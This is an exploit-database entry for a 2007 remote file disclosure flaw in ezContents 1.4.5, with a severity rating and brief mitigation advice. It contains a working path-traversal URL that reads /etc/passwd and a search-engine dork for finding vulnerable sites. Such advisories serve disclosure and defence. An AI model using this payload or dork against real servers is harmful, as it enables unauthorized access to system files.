header-logo
Suggest Exploit
vendor:
ezContents
by:
p4imi0
7.5
CVSS
HIGH
Remote File Disclosure
200
CWE
Product Name: ezContents
Affected Version From: 1.4.2005
Affected Version To: 1.4.2005
Patch Exists: NO
Related CWE:
CPE: a:ezcontents:ezcontents:1.4.5
Metasploit:
Other Scripts:
Platforms Tested:
2007

ezContents Version 1.4.5 Remote File Disclosure Vulnerability

This vulnerability allows an attacker to disclose arbitrary files on the server. By exploiting the '/ezcontents1_4x/index.php?link=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd' URL, an attacker can access sensitive files such as the '/etc/passwd' file.

Mitigation:

Upgrade to a newer version of ezContents or apply a patch if available. Restrict access to the vulnerable URL.
Source

Exploit-DB raw data:

--------------------------------------------------------------
ezContents Version 1.4.5 Remote File Disclosure Vulnerability.
--------------------------------------------------------------

download    : http://www.visualshapers.com/
author      : p4imi0
contact     : p4imi0@gmail.com
exploit     : /ezcontents1_4x/index.php?link=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
google dork : inurl:"index.php?link=" Powered by ezContents Version 1.4.5
thanks to   : str0ke, Cr[]w.

# milw0rm.com [2007-12-05]

Navigation

Suggest Exploit

Services By CQR